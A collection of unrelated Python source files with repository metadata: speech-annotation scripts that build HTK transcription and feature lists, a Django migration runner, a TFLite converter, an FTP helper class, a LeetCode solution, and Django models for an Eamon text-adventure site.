mlf_fileName = 'standard' + mlf_version + '.mlf'
mlf_version4Dev = '_dev_v4'
mlf_fileName4Dev = 'standard' + mlf_version4Dev + '.mlf'
mlf_version4Test = '_test_v4'
mlf_fileName4Test = 'standard' + mlf_version4Test + '.mlf'
mlf_version4MCI = '_mci_v4'
mlf_fileName4MCI = 'standard' + mlf_version4MCI + '.mlf'
mlf_version4AD = '_ad_v4'
mlf_fileName4AD = 'standard' + mlf_version4AD + '.mlf'
# generate Elder.scp
scp_version = '_v4'
scp_fileName = 'Elder' + scp_version + '.scp'
scp_version4Dev = '_dev'+ scp_version
scp_fileName4Dev = 'Elder' + scp_version4Dev + '.scp'
scp_version4Test = '_test'+ scp_version
scp_fileName4Test = 'Elder' + scp_version4Test + '.scp'
scp_version4MCI = '_mci'+ scp_version
scp_fileName4MCI = 'Elder' + scp_version4MCI + '.scp'
scp_version4AD = '_ad'+ scp_version
scp_fileName4AD = 'Elder' + scp_version4AD + '.scp'
scp_version4SF = '_SF'+ scp_version
scp_fileName4SF = 'Elder' + scp_version4SF + '.scp'
scp_fileName4SF4AD = 'Elder' + scp_version4SF + '_ad' + '.scp'
scp_fileName4SFnotTrain = 'Elder' + scp_version4SF + '_notTrain' + '.scp'
# feature archive paths embedded in the generated .scp lines
feat4Dev = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-dev/data/old_dev/pap/feat/'
feat4Test = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-test/data/old_test/pap/feat/'
feat4MCI = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-mci/data/old_mci/pap/feat/'
feat4AD = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-ad/data/old_ad/pap/feat/'
feat4SF = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-sf/data/old_sf/pap/feat/'
feat4ST = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-st/data/old_all/pap/feat/'
# generate StartEndCheck.txt
se_check_version = '_v1'
se_fileName = 'StartEndCheck' + se_check_version + '.txt'
# ------------------------ Stable Parameters --------------------------
# ========================== File Process ================================
# ------------------------ Path Access --------------------------
def get_filePaths(dir):
    """Return the paths of all .TextGrid files directly inside *dir*.

    :param dir: directory path, expected to end with '/'
    :return: list of '<dir><filename>' strings, in os.listdir order
    """
    return [dir + name for name in os.listdir(dir) if '.TextGrid' in name]
def get_filePaths1(dir):
    """Recursively collect the paths of all .TextGrid files under *dir*.

    Fix: the original called ``os.path.walk()`` with no arguments, which
    raises immediately (the function does not even exist on Python 3) and
    made this recursive variant unusable.  It now walks the tree with
    ``os.walk``.

    :param dir: root directory to search
    :return: list of full .TextGrid file paths
    """
    filePaths = list()
    for root, _dirs, fileNames in os.walk(dir):
        for fileName in fileNames:
            if '.TextGrid' in fileName:
                filePaths.append(os.path.join(root, fileName))
    return filePaths
# ------------------------ Path Filter --------------------------
def ste_filter_paths(file_list, state_list=state_List):
    """Keep only the paths whose subject-state code is in *state_list*.

    :param file_list: list of file paths
    :param state_list: allowed state codes (e.g. ['N', 'M', 'A'])
    :return: filtered list, original order preserved
    """
    return [p for p in file_list if get_fileState(p) in state_list]
def num_filter_paths(file_list, num_list=num_List):
    """Keep only the paths whose subject number is in *num_list*.

    :param file_list: list of file paths
    :param num_list: allowed subject numbers
    :return: filtered list, original order preserved
    """
    return [p for p in file_list if get_fileNum(p) in num_list]
def mdl_filter_paths(file_list, module_list=module_List):
    """Keep only the paths whose module code is in *module_list*.

    File names look like N_053_guolaixiang_M_20180723_mono_PD...

    :param file_list: list of file paths
    :param module_list: allowed module codes (e.g. ['PD', 'SI'])
    :return: filtered list, original order preserved
    """
    return [p for p in file_list if get_fileModule(p) in module_list]
def pathFilter(path_list, ste_list=state_List, num_list=num_List, mdl_list=module_List):
    """Apply the state, number and module filters to *path_list* in sequence."""
    filtered = ste_filter_paths(path_list, ste_list)
    filtered = num_filter_paths(filtered, num_list)
    return mdl_filter_paths(filtered, mdl_list)
# ------------------------ Path Process -----------------------
def get_fileName(filePath):
    """Return the base file name of *filePath* without its extension."""
    base_name = filePath.split('/')[-1]
    return base_name.split('.')[0]
def get_fileState(filePath):
    """Return the subject state code (N / M / A) encoded in the file name."""
    base_name = filePath.split('/')[-1]
    return base_name.split('_')[0]
def get_fileModule(filePath):
    """Return the module code (7th '_'-separated field) from the file name.

    Example name: N_053_guolaixiang_M_20180723_mono_PD -> 'PD'.
    """
    base_name = filePath.split('/')[-1]
    return base_name.split('_')[6]
def get_fileNum(filePath):
    """Return the subject number (2nd '_'-separated field) as an int."""
    base_name = filePath.split('/')[-1]
    return int(base_name.split('_')[1])
# ------------------------ File Write -----------------------
def writeLines2File(fileName, lines, firstLine=None, encoding='utf-8'):
    """Write *lines* to *fileName* one per line, optionally preceded by *firstLine*.

    Returns the (already closed) file object, preserving the original contract.
    """
    with open(fileName, 'w', encoding=encoding) as f:
        if firstLine is not None:
            f.write(firstLine + '\n')
        f.writelines(line + '\n' for line in lines)
    return f
# ------------------------ File Copy -----------------------
def copyFile2Dir(file_path, dir_path):
    """Copy a .TextGrid file into *dir_path*.

    :param file_path: source file path
    :param dir_path: target directory, must end with '/', e.g. 'dir/'
    """
    target = dir_path + get_fileName(file_path) + '.TextGrid'
    shutil.copyfile(file_path, target)
def copyFiles2Dir(file_pathList, dir_path):
    """Copy every file in *file_pathList* into *dir_path* (must end with '/')."""
    for source_path in file_pathList:
        copyFile2Dir(source_path, dir_path)
# ========================== Data Access ================================
# ------------------lable.txt --------------------
# *********** 根据单个文件名获取label内容 *******************
def get_labelList_from_textgrid(path):
    """Load one TextGrid and return its first tier as [start, end, text] lists."""
    tg = tgio.openTextgrid(path)
    first_tier = tg.tierDict[tg.tierNameList[0]]
    return [list(entry[:3]) for entry in first_tier.entryList]
# *********** 根据文件名列表获取label内容 *******************
def get_labelList_from_textgrids(path_list):
    """Concatenate the label lists of several TextGrid files, in path order."""
    all_labels = []
    for path in path_list:
        all_labels.extend(get_labelList_from_textgrid(path))
    return all_labels
def get_labels(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName=L_fileName):
    """Collect annotation texts from all matching TextGrids and write them,
    one per line, to *fileName* (GBK encoded, e.g. test.txt / train.txt).

    :param dir_path: directory containing the TextGrid files
    :param states: allowed subject states
    :param modules: allowed module codes
    :param nums: allowed subject numbers
    :param fileName: output text file
    """
    paths = get_filePaths(dir_path)
    paths.sort()
    paths = pathFilter(paths, ste_list=states, mdl_list=modules, num_list=nums)
    labels = filter_sentence(get_labelList_from_textgrids(paths), filterList=mlf_filterList)
    labels.sort()
    with open(fileName, 'w', encoding='gbk') as f:
        for label in labels:
            f.write(label[2] + '\n')
# ========================== Data Check ================================
def filter_sentence(labelList, filterList=mlf_filterList):
    """Strip pinyin tags, then drop labels whose text contains an illegal token.

    Kept labels are echoed to stdout (debug trace preserved from the original).

    :param labelList: list of [start, end, text] labels
    :param filterList: tokens that disqualify a label
    :return: the surviving labels
    """
    kept = []
    for label in removePinyin(labelList):
        if has_illegal_char(label[2], filterList):
            continue
        print(label)
        kept.append(label)
    return kept
def has_illegal_char(checked_str, check_list=mlf_filterList):
    """Return True if any token from *check_list* occurs in *checked_str*."""
    return any(token in checked_str for token in check_list)
def removePinyin(labelList):
    """Return a deep-ish copy of *labelList* with pinyin tags such as '[ni3]'
    removed from each text field.

    The substitution is only attempted when the text contains '[' followed by
    a lowercase letter, matching the original gating behaviour.
    """
    pattern = re.compile(r'\[([a-z0-9])+\]')
    markers = ['[' + chr(code) for code in range(ord('a'), ord('z') + 1)]
    cleaned = [[start, end, text] for start, end, text in labelList]
    for entry in cleaned:
        if any(marker in entry[2] for marker in markers):
            entry[2] = pattern.sub('', entry[2])
    return cleaned
# ------------------------ StartEndCheck.log -----------------------
# *********** 检测 末尾音频是否留静默段 *******************
def is_blankEnd(filePath):
    """True if the last label interval ends exactly at the audio end, i.e.
    no trailing silence was left after the final annotation.

    Times are compared in centiseconds to sidestep float jitter.
    """
    tg = tgio.openTextgrid(filePath)
    first_tier = tg.tierDict[tg.tierNameList[0]]
    audio_end = int(float(tg.maxTimestamp) * 100)
    last_label_end = int(float(first_tier.entryList[-1][-2]) * 100)
    return audio_end == last_label_end
# *********** 检测 开始音频是否留静默段 *******************
def is_blankStart(filePath):
    """True if the first label interval starts exactly at the audio start,
    i.e. no leading silence was left before the first annotation.

    Times are compared in centiseconds to sidestep float jitter.
    """
    tg = tgio.openTextgrid(filePath)
    first_tier = tg.tierDict[tg.tierNameList[0]]
    audio_start = int(float(tg.minTimestamp) * 100)
    first_label_start = int(float(first_tier.entryList[0][0]) * 100)
    return audio_start == first_label_start
# *********** 检测末尾音频是否留静默段 *******************
def check_ends(dir_path=mark_path, modules=module_List, nums=num_List):
    """Return base names of filtered TextGrids whose final label runs to the
    very end of the audio (no trailing silent margin)."""
    paths = get_filePaths(dir_path)
    paths = mdl_filter_paths(paths, modules)
    paths = num_filter_paths(paths, nums)
    paths.sort()
    return [path.split('/')[-1] for path in paths if is_blankEnd(path)]
# *********** Check whether the audio START is left with a silent segment *******************
def check_starts(dir_path=mark_path, modules=module_List, nums=num_List):
    """Return base names of filtered TextGrids whose first label starts at
    the very beginning of the audio (no leading silent margin)."""
    paths = get_filePaths(dir_path)
    paths = mdl_filter_paths(paths, modules)
    paths = num_filter_paths(paths, nums)
    paths.sort()
    return [path.split('/')[-1] for path in paths if is_blankStart(path)]
# *********** 合并starts & ends dir列表 *******************
def combineSEDir(starts_list, ends_list):
    """Merge the start-check and end-check results into annotated strings.

    Names appearing in both lists get ': Start/End'; the remainder get
    ': Start' or ': End' depending on their list of origin.  Order is:
    start-only entries, end-only entries, then combined entries.
    """
    both = [name for name in starts_list if name in ends_list]
    merged = [name + ': Start' for name in starts_list if name not in both]
    merged += [name + ': End' for name in ends_list if name not in both]
    merged += [name + ': Start/End' for name in both]
    return merged
def checkSE(dir_path=mark_path, modules=module_List, nums=num_List, fileName=se_fileName):
    """Write the start/end silent-margin report for the filtered files.

    Fix: dir_path, modules and nums were previously ignored because
    check_ends() and check_starts() were called without arguments; they are
    now forwarded so callers can actually restrict the checked set.  Also
    renames the local that shadowed the builtin ``list``.

    :param dir_path: directory containing the TextGrid files
    :param modules: allowed module codes
    :param nums: allowed subject numbers
    :param fileName: output report file
    """
    ends_list = check_ends(dir_path, modules, nums)
    starts_list = check_starts(dir_path, modules, nums)
    report_lines = combineSEDir(starts_list, ends_list)
    writeLines2File(fileName, report_lines)
# ------------------------ MarkCheck.txt -----------------------
def get_LabelList(filePath):
    """Return the first tier of *filePath* as [start, end, text] lists.

    NOTE(review): duplicates get_labelList_from_textgrid; kept for the
    callers that use this spelling.
    """
    tg = tgio.openTextgrid(filePath)
    first_tier = tg.tierDict[tg.tierNameList[0]]
    return [list(entry[:3]) for entry in first_tier.entryList]
def isContentAbnormal(content, checkList):
    """Return True if *content* contains any marker from *checkList*."""
    return any(marker in content for marker in checkList)
def checkContents(path_list, content_checkList):
    """Collect (file name, label text) pairs whose text contains a checked marker."""
    findings = []
    for filePath in path_list:
        base_name = get_fileName(filePath)
        for label in get_LabelList(filePath):
            if isContentAbnormal(label[-1], content_checkList):
                findings.append((base_name, label[-1]))
    return findings
def checkMark(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName = mark_check_fileName):
"""
:param dir_path: str
:param modules: list
:param nums: list
:param fileName: str
:return:
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, mdl_list=modules, num_list=nums)
check_list = checkContents(data_dirs, mark_checkList)
check_list = set(check_list)
check_list = list(check_list)
check_list.sort()
firstLine = '#Check Mark#' + '\n' \
'Checked Dir: ' + dir_path + '\n' \
+ 'Checked Label: ' + str(mark_checkList) + '\n'
writeLines2File(fileName, [check[0] + '\n' + check[1] + '\n' for check in check_list],
firstLine)
return
# ========================== SCP Process ================================
# ------------------------ Elder.scp -----------------------
# *********** 获取格式化数字 *******************
# 12位数,前方补0
# 单位:纳秒
#
def get_format_strNum_12(num):
dup_num = 10e7
return str(round(num * dup_num)).zfill(12)
# *********** 获取格式化数字 *******************
# 小数保留两位
# 单位:
#
def get_format_strNum_2(num):
return str(round(num * 100))
# *********** 根据文件名列表获取label内容 *******************
def get_scp(filePath, fileName_1):
scp_list = list()
labelList = get_LabelList(filePath)
fileName = get_fileName(filePath)
filtered_labelList = filter_sentence(labelList)
for i in range(len(filtered_labelList)):
start_time = filtered_labelList[i][0]
end_time = filtered_labelList[i][1]
print('fileName: ' + fileName_1)
if 'test' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4Test + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
continue
elif 'dev' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4Dev + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
continue
elif 'mci' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4MCI + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'ad' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4AD + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'SF' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4SF + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'ST' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4ST + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
scp_list.append(scp)
return scp_list
# *********** 根据文件名列表获取scp内容 *******************
def get_scpList_from_textgrids(path_list, fileName=None):
scpList = list()
for path in path_list:
scps = get_scp(path, fileName)
for scp in scps:
scpList.append(scp)
return scpList
def get_scps(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName = scp_fileName):
"""
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
:param dir_path: str
:param states: List[str]
:param modules: List[str]
:param nums: List[int]
:param fileName: str
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
scps = get_scpList_from_textgrids(data_dirs, fileName)
scps.sort()
writeLines2File(fileName, scps)
# ========================== MLF Process ================================
# ------------------standard.mlf --------------------
# *********** 根据文件名列表获取mlf内容 *******************
def get_mlfList_from_textgrids(path_list):
stdList = list()
for path in path_list:
stds = get_mlf(path)
for std in stds:
stdList.append(std)
return stdList
# *********** 根据文件名列表获取stardard.mlf *******************
def get_mlf(filePath):
std_list = list()
tg = tgio.openTextgrid(filePath)
firstTier = tg.tierDict[tg.tierNameList[0]]
labelList = [[entry[0], entry[1], entry[2]] for entry in firstTier.entryList]
fileName = get_fileName(filePath)
print('fileName: ' + fileName)
filtered_labelList = filter_sentence(labelList)
for i in range(len(filtered_labelList)):
# print(filtered_labelList[i][2])
std = '\"' + fileName + '_' + get_format_strNum_12(filtered_labelList[i][0]) + '_' + get_format_strNum_12(
filtered_labelList[i][1]) + '.lab\"\n'
for word in filtered_labelList[i][2]:
std += word + '\n'
std += '.'
# print(std)
std_list.append(std)
return std_list
def get_mlfs(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName=mlf_fileName):
"""
生成standard.mlf
:param dir_path: list
:param modules: list
:param nums: list
:param fileName: str
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
stds = get_mlfList_from_textgrids(data_dirs)
stds.sort()
with open(fileName, 'w', encoding='gbk') as f:
f.write('#!MLF!#\n')
for line in stds:
f.write(line + '\n')
# ========================== Main ================================
if __name__ == '__main__':
# get_scps(states=state_Normal, nums=num_List4Dev, modules=module_List4U, fileName=scp_fileName4Dev)
# get_mlfs(states=state_Normal, nums=num_List4Dev, modules=module_List4U, fileName=mlf_fileName4Dev)
# get_scps(states=state_Normal, nums=num_List4Test, modules=module_List4U, fileName=scp_fileName4Test)
# get_mlfs(states=state_Normal, nums=num_List4Test, fileName=mlf_fileName4Test)
# get_scps(states=state_MCI, nums=num_List4MCI, modules=module_List4U, fileName=scp_fileName4MCI)
# get_mlfs(states=state_MCI, nums=num_List4MCI, fileName=mlf_fileName4MCI)
# get_scps(states=state_AD, nums=num_List4AD, modules=module_List4U, fileName=scp_fileName4AD)
# get_scps(states=state_List, nums=num_List4AllexptTrain, modules=['SF'], fileName=scp_fileName4SFnotTrain)
get_scps(states=state_List, nums=num_List, modules=['SF'], fileName=scp_fileName4SF)
# get_mlfs(states=state_AD, nums=num_List4AD, fileName=mlf_fileName4AD)
# get_mlfs(states=state_List, nums=num_List, modules=module_List4F, fileName='standard_all4M_addSF.mlf')
# get_labels(states=state_List, modules=module_List, nums=num_List, fileName=L_fimeName4All)
# get_labels(states=state_Normal, modules=module_List4U, nums=num_List4Dev, fileName=L_fileName4Dev)
# get_labels(states=state_Normal, modules=module_List4R, nums=num_List4Train, fileName=L_fileName4Train)
# get_labels(states=state_Normal, modules=module_List4F, nums=num_List4Train, fileName='L_addSF.txt')
# get_labels(states=state_Normal, modules=['SF'], nums=num_List4Dev, fileName=L_fileName4Dev_SF)
# get_labels(states=state_Normal, modules=['SF'], nums=num_List4Test, fileName=L_fileName4Test_SF)
# get_labels(states=state_Normal, modules=['PD'], nums=num_List4Test, fileName=L_fileName4Test_PD)
# get_labels(states=state_Normal, modules=['SI'], nums=num_List4Test, fileName=L_fileName4Test_SI)
# get_labels(states=state_Normal, modules=['SR'], nums=num_List4Test, fileName=L_fileName4Test_SR)
# get_labels(states=state_Normal, modules=['SS'], nums=num_List4Test, fileName=L_fileName4Test_SS)
# get_scps(states=state_List, nums=num_List, modules=['SF'], fileName=scp_fileName4SF)
# checkSE()
# checkMark()
# 复制所有文件到同一文件夹下
# data_dirs = get_data_list(data_path)
# copyFiles2Dir(data_dirs, dir_path)
| [
"panjingshen@SystemE.local"
] | panjingshen@SystemE.local |
ab0ee7884f8c23d456df902c932e3ff95f458850 | 7d54aac98a37811dd039b5027c4efeea0b411c8c | /migrate.py | 11620f259f02ba292af0fa5a56d2240a3a9c9260 | [] | no_license | mmoallemi99/serverless-micro-django | be7f54747e8763b222a8f3e4ef61b2088a7d8a8f | 9a9af78277add0a1f1bae70ff46628f72e1061f0 | refs/heads/master | 2023-01-11T03:43:18.854616 | 2020-11-15T10:19:39 | 2020-11-15T10:19:39 | 296,683,346 | 15 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | import os
import django
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'serverless_micro_django.settings')
django.setup()
from django.core import management
from django.core.management.commands import migrate
management.call_command(migrate.Command())
| [
"mohammadmoallemi@outlook.com"
] | mohammadmoallemi@outlook.com |
e99014e61287b1074dd218fa089c6f965099a281 | 777c59386be4730e07b407d79492ef51b5d0f7a7 | /h5_to_tflite.py | dd3d7f56e6b6030f5de1ecdc056dd2e07a6b5cc9 | [] | no_license | pandongwei/test_raspberry | c899b202c5248a65c0d9f2cce1b3b755cd545490 | 9187c6ee278f4767df1728a7f784ba95af806cc9 | refs/heads/master | 2021-04-14T10:23:57.478606 | 2020-04-18T13:32:11 | 2020-04-18T13:32:11 | 249,226,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #from keras.backend import clear_session
import numpy as np
import tensorflow as tf
#clear_session()
np.set_printoptions(suppress=True)
input_graph_name = '/home/pan/master-thesis-in-mrt/test_raspberry/train_result/network/large_model_final.h5'
output_graph_name = '/home/pan/master-thesis-in-mrt/test_raspberry/train_result/network/MobileNetV3_large_weights_89.50%_89.99%_93.68%.tflite'
converter = tf.lite.TFLiteConverter.from_keras_model_file(model_file=input_graph_name)
converter.post_training_quantize = False #是否量化的选项
tflite_model = converter.convert()
open(output_graph_name, "wb").write(tflite_model)
print("generate:",output_graph_name) | [
"usrki@student.kit.edu"
] | usrki@student.kit.edu |
9e5753bf090df4234b05b12bebf37875bf37987e | c99c1d41215b91237b7f6d63dcf0ac23b0dc1137 | /FTPManager.py | 6fcbeeefa6ae40090cda153f17159c1b01f4845f | [] | no_license | hugosoftdev/B3_FTP_BOT | 26bcba525d1676587b4d40d2701b0e1d56aae30f | 21971a72a05986f2a9e1ad02890840e4d16ac452 | refs/heads/master | 2020-07-08T22:45:01.575323 | 2019-09-03T14:49:20 | 2019-09-03T14:49:20 | 203,801,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import ftplib
import os
from io import BytesIO
from helper import randomString
class FTPManager:
def __init__(self, host,username=None,password=None):
self.host = host
self.username = username
self.password = password
self.connection = ftplib.FTP(host)
self.folderPath = None
self.isLogged = False
def Login(self):
if(self.username != None and self.password != None):
self.connection.login(self.username, self.password)
else:
self.connection.login()
self.isLogged = True
def IsLoggedIn(self):
return self.isLogged
def VerifyLogin(self):
if(not self.IsLoggedIn()):
raise Exception("You must be logged in first")
def SetFolderPath(self,path):
self.VerifyLogin()
self.folderPath = path
self.connection.cwd(path)
def ListFolderFiles(self):
if(self.folderPath != None):
fileNames = []
self.connection.dir(fileNames.append)
fileNames = [x.split(" ")[-1] for x in fileNames]
return fileNames
else:
raise Exception("You must set the folder directory first")
def DownloadFile(self, fileName):
myfile = BytesIO()
self.connection.retrbinary('RETR ' + fileName, myfile.write)
myfile.seek(0)
return myfile
| [
"hugospm@al.insper.edu.br"
] | hugospm@al.insper.edu.br |
f5c263ff57f2af9eca8b0cb37427ffd481a5c178 | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/2-Python-Basics-part2/4-ternary-operator_20200413230611.py | 18fc81dee16c1d156f9fe477dc7652c5da62075c | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | # conditonal expressions
condition_if | [
"tikana4@yahoo.com"
] | tikana4@yahoo.com |
943b6c28ec80a06df2c17590ab5913fb9889f5f1 | 552e0e8a8eff328e346627ee2dd14aec7d8cdfb0 | /4001 - 5000/4760 Move zeroes | Python.py | 74df3857599735aa3a10250063c0216de678b9aa | [] | no_license | tentacion098/e-olymp-solutions | f79107faedd39731e0b2428652547c293f7305f4 | 3229597c7f9eca41d1de9f1b8595eae9dfe7fc38 | refs/heads/master | 2023-05-02T02:51:59.701042 | 2021-05-15T18:58:04 | 2021-05-15T18:58:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | n = input()
nonzero = []
zeroes = []
ededler = [int(j) for j in input().split()]
for i in ededler:
if(i != 0):
nonzero.append(i)
if(i == 0):
zeroes.append(i)
print(*(nonzero + zeroes), end="")
| [
"noreply@github.com"
] | noreply@github.com |
9da6da5fba9daedf9b2e92c80aa332916e18eeae | 659653ebdff3d70e0c04cd0292e489dc537b4112 | /setup.py | 709ece69ddc3e6068b1178071932256215b94e81 | [] | no_license | vangheem/clouddrive | 48de3dd21f66c4ea207e6cbfefff630825349bb3 | 1b0e74dd4e9cd3dc838a3c13866ccef8a3920b63 | refs/heads/master | 2021-01-10T02:11:52.997944 | 2016-09-20T02:30:51 | 2016-09-20T02:30:51 | 48,830,570 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # -*- coding: utf-8 -*-
import os
from setuptools import setup
from setuptools import find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name='clouddrive',
version='0.1.dev0',
description='',
long_description='',
classifiers=[
"Programming Language :: Python",
],
author='Nathan Van Gheem',
author_email='nathan@vangheem.us',
url='',
license='BSD',
packages=find_packages(exclude=['ez_setup']),
install_requires=[
'requests',
'flask',
'ZEO',
'ZODB',
'python-dateutil'
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
run-server = clouddrive:run_server
run-monitor = clouddrive.monitor:run
""",
include_package_data=True,
zip_safe=False,
)
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
6a7cc2d596827c9bde48ed3927efac4efb6ee38c | 1ffbdfff2c9632fa8ecd6288578e1d02f740ee23 | /2020_/07/LeetCodeBitManipulation/03E_1356. Sort Integers by The Number of 1 Bits.py | dc2f4d00cc3f90c25830cf14864e295c482b40d1 | [] | no_license | taesookim0412/Python-Algorithms | c167c130adbe04100d42506c86402e729f95266c | c6272bbcab442ef32f327f877a53ee6e66d9fb00 | refs/heads/main | 2023-05-01T09:40:44.957618 | 2021-05-12T10:52:30 | 2021-05-12T10:52:30 | 366,682,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | import collections
import numpy as np
from typing import List
#Runtime: 72 ms, faster than 68.71% of Python3 online submissions for Sort Integers by The Number of 1 Bits.
#Memory Usage: 13.8 MB, less than 86.25% of Python3 online submissions for Sort Integers by The Number of 1 Bits.
class Solution:
def sortByBits(self, arr: List[int]) -> List[int]:
arr.sort()
data = collections.defaultdict(list)
res = []
for i in range(len(arr)):
numberOfOnes = str(bin(arr[i])).count('1')
data[numberOfOnes] += arr[i],
for key, val in sorted(data.items()):
print(key,val)
res += val
return res
s = Solution()
print(s.sortByBits([0,1,2,3,4,5,6,7,8]))
print(s.sortByBits([10,100,1000,10000])) | [
"taesoo.kim0412@gmail.com"
] | taesoo.kim0412@gmail.com |
cfbd6b9b962886737f7fde0c1dd2f399f97d3ffe | d721258b53f0f44b1010cb8e8efac8e2a5c96c26 | /adventure/models.py | babb8aa7915cc58b6585820f8664bb9817390484 | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | kdechant/eamon | a6662285f51a6cad5797bb9be92ca709ae36921c | 080a43aa80c3a1605c402e68616545a8e9c7975c | refs/heads/master | 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 | MIT | 2023-03-14T21:09:55 | 2016-01-13T08:07:28 | TypeScript | UTF-8 | Python | false | false | 22,320 | py | from django.db import models
from taggit.managers import TaggableManager
ARTIFACT_TYPES = (
(0, 'Gold'),
(1, 'Treasure'),
(2, 'Weapon'),
(3, 'Magic Weapon'),
(4, 'Container'),
(5, 'Light Source'),
(6, 'Drinkable'),
(7, 'Readable'),
(8, 'Door/Gate'),
(9, 'Edible'),
(10, 'Bound Monster'),
(11, 'Wearable'), # armor/shield
(12, 'Disguised Monster'),
(13, 'Dead Body'),
(14, 'User 1'),
(15, 'User 2'),
(16, 'User 3'),
)
AXE = 1
BOW = 2
CLUB = 3
SPEAR = 4
SWORD = 5
WEAPON_TYPES = (
(AXE, 'Axe'),
(BOW, 'Bow'),
(CLUB, 'Club'),
(SPEAR, 'Spear'),
(SWORD, 'Sword')
)
CLOTHING_TYPES = (
(0, 'Clothes or Armor/Shield'),
(1, 'Coats, Capes, etc.'),
(2, 'Shoes, boots'),
(3, 'Gloves'),
(4, 'Hats, headwear'),
(5, 'Jewelry'),
(6, 'Undergarments'),
)
ARMOR_TYPES = (
(0, 'Armor'),
(1, 'Shield'),
(2, 'Helmet'),
(3, 'Gloves'),
(4, 'Ring'),
)
MARKDOWN_CHOICES = [(False, "Plain text"), (True, "Markdown")]
class Author(models.Model):
    """A person credited with writing one or more adventures."""
    name = models.CharField(max_length=50)
    def __str__(self):
        """Display the author's name (used in the admin and shell)."""
        return self.name
class Adventure(models.Model):
    """
    An adventure (game module): its descriptive/intro text, publication
    metadata, and legacy Eamon Deluxe (EDX) import settings. Rooms, artifacts,
    effects, monsters, hints, and hint answers all reference this model.
    """
    name = models.CharField(max_length=50)
    description = models.TextField(default='', blank=True)
    full_description = models.TextField(default='', blank=True)
    intro_text = models.TextField(
        default='', blank=True,
        help_text="Text shown to the adventurer when they begin the adventure. Use this to set up the story. Split"
                  " it into multiple pages by using a line containing three hyphens as a break. Supports Markdown."
    )
    intro_question = models.TextField(
        default='', blank=True,
        help_text="If you want to ask the adventurer a question when they start the adventure, put"
                  " the question text here. The answer will be available in the game object."
    )
    slug = models.SlugField(null=True)
    # Legacy Eamon Deluxe (EDX) import settings. The *_offset fields shift the
    # IDs of records imported from an EDX data file.
    edx = models.CharField(null=True, max_length=50, blank=True)
    edx_version = models.FloatField(default=0, blank=True, null=True)
    edx_room_offset = models.IntegerField(default=0, null=True, blank=True)
    edx_artifact_offset = models.IntegerField(default=0, null=True, blank=True)
    edx_effect_offset = models.IntegerField(default=0, null=True, blank=True)
    edx_monster_offset = models.IntegerField(default=0, null=True, blank=True)
    edx_program_file = models.CharField(null=True, max_length=50, blank=True)
    # Number of movement directions this adventure's map uses (default 6).
    directions = models.IntegerField(default=6)
    dead_body_id = models.IntegerField(
        default=0, blank=True, null=True,
        help_text="The artifact ID of the first dead body. Leave blank to not use dead body artifacts.")
    # Fixed: use a boolean default on a BooleanField (was default=0; identical
    # behavior since 0 == False, but the int default was non-idiomatic).
    active = models.BooleanField(default=False)
    # the first and last index of hints read from the hints file - used with the import_hints management command
    first_hint = models.IntegerField(null=True, blank=True)
    last_hint = models.IntegerField(null=True, blank=True)
    date_published = models.DateField(null=True, blank=True)
